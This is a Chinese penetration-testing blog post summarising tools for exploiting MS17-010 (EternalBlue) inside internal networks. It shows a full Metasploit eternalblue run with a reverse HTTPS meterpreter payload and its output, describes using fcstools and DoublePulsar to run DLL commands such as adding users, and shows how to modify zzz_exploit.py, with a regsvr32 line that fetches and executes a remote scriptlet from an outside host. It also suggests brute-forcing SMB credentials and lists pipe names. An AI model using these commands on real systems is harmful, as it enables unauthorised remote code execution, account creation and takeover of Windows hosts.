HOME
HOME
文章目录
  1. 0x01 msf
  2. 0x02 fcstools
  3. 0x03 zzz_exploit.py

ms17010工具总结

2020.08.18 le31ei Pentest  热度

本文记录下实战中用到的ms17010的利用工具,实战中用过众多工具,都是哪个能成功就用哪个,还未做系统总结。本文记录下使用记录,做个总结备忘。

0x01 msf

第一个工具当属大家熟悉ms17_010_eternalblue工具,集成在msf当中。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
msf5 > search 17-010

Matching Modules
================

   #  Name                                           Disclosure Date  Rank     Check  Description
   -  ----                                           ---------------  ----     -----  -----------
   0  auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   1  auxiliary/scanner/smb/smb_ms17_010                              normal   No     MS17-010 SMB RCE Detection
   2  exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   3  exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
   4  exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   5  exploit/windows/smb/smb_doublepulsar_rce       2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution

其中smb_doublepulsar_rce工具是使用nsa利用工具后留下的后门,可以用此工具反弹meterpreter。一般在内网中优先使用auxiliary/scanner/smb/smb_ms17_010扫描漏洞是否存在后再利用工具进行攻击。

使用如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
msf5 > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > show options 

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS                          yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT          445              yes       The target port (TCP)
   SMBDomain      .                no        (Optional) The Windows domain to use for authentication
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target.


Payload options (windows/x64/meterpreter/reverse_https):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     172.16.26.213    yes       The local listener hostname
   LPORT     8443             yes       The local listener port
   LURI                       no        The HTTP Path


Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs


msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 172.16.26.238
rhosts => 172.16.26.238
msf5 exploit(windows/smb/ms17_010_eternalblue) > run

[*] Started HTTPS reverse handler on https://172.16.26.213:8443
[*] 172.16.26.238:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 172.16.26.238:445     - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Enterprise 7601 Service Pack 1 x64 (64-bit)
[*] 172.16.26.238:445     - Scanned 1 of 1 hosts (100% complete)
[*] 172.16.26.238:445 - Connecting to target for exploitation.
[+] 172.16.26.238:445 - Connection established for exploitation.
[+] 172.16.26.238:445 - Target OS selected valid for OS indicated by SMB reply
[*] 172.16.26.238:445 - CORE raw buffer dump (53 bytes)
[*] 172.16.26.238:445 - 0x00000000  57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32  Windows Server 2
[*] 172.16.26.238:445 - 0x00000010  30 30 38 20 52 32 20 45 6e 74 65 72 70 72 69 73  008 R2 Enterpris
[*] 172.16.26.238:445 - 0x00000020  65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 50  e 7601 Service P
[*] 172.16.26.238:445 - 0x00000030  61 63 6b 20 31                                   ack 1           
[+] 172.16.26.238:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 172.16.26.238:445 - Trying exploit with 12 Groom Allocations.
[*] 172.16.26.238:445 - Sending all but last fragment of exploit packet
[*] 172.16.26.238:445 - Starting non-paged pool grooming
[+] 172.16.26.238:445 - Sending SMBv2 buffers
[+] 172.16.26.238:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 172.16.26.238:445 - Sending final SMBv2 buffers.
[*] 172.16.26.238:445 - Sending last fragment of exploit packet!
[*] 172.16.26.238:445 - Receiving response from exploit packet
[+] 172.16.26.238:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 172.16.26.238:445 - Sending egg to corrupted connection.
[*] 172.16.26.238:445 - Triggering free of corrupted buffer.
[-] 172.16.26.238:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 172.16.26.238:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 172.16.26.238:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

该工具的利用成功率并不高,对目标系统版本要求较高,需要为win7或者winserver2008 r2,但结合msf的meterpreter进行流量代理,先在内网中过一遍c段倒是挺好的。

0x02 fcstools

适用于在内网中,服务器无法出外网或者反弹到shell的情况,能够直接执行命令,如在目标机器添加用户等。一般msf等工具都是直接反弹meterpreter,如果目标机在无法出外网或者反弹的情况就只能使用这个离线工具。

该工具需要配合DLL生成工具进行,替换掉x86或者x64文件,fcstools就会执行相关的dll命令。

image-20200818130214827

生成dll后,替换fcstools里面的x86或者x64文件,注意添加用户时,密码要满足系统的复杂度要求

.image-20200818130320705

然后就可以运行工具进行攻击了,

image-20200818130946475

eternalblue工具种下后门后,点击doublepulsar,利用后门执行dll里面的命令

image-20200818131312293

0x03 zzz_exploit.py

github地址:https://github.com/worawit/MS17-010

该脚本有几个关键点需要注意:

  1. 需要有一个系统可登陆的smb账户,可通过爆破等方式获取
1
2
USERNAME = ''
PASSWORD = ''
  1. python zzz_exploit.py <ip> [pipe_name],需要有一个管道名。常见的管道名如下:
1
netlogon lsarpc samr browser atsvc DAV RPC SERVICE epmapper eventlog InitShutdown keysvc lsass LSM_API_service ntsvcs plugplay protected_storage router SapiServerPipeS-1-5-5-0-70123 scerpc srvsvc tapsrv trkwks W32TIME_ALT wkssvc PIPE_EVENTROOT\CIMV2SCM EVENT PROVIDER db2remotecmd

3、默认的脚本是在c盘创建一个pwn.txt文件,需要修改为cs或者msf生成的执行文件,就能反弹

1
2
3
4
5
6
7
8
def smb_pwn(conn, arch):
    smbConn = conn.get_smbconnection()
    
    print('creating file c:\\pwned.txt on the target')
    tid2 = smbConn.connectTree('C$')
    fid2 = smbConn.createFile(tid2, '/pwned.txt')
    smbConn.closeFile(tid2, fid2)
    smbConn.disconnectTree(tid2)

可改为如下代码

1
service_exec(conn, r'cmd /c regsvr32 /s /n /u /i:http://192.168.2.164:8080/test.sct scrobj.dll')

以上便是几个使用频率比较高的工具,还有诸如CS上面的插件,k8的扫描工具等,效果一般或者比较傻瓜化,故不再记录。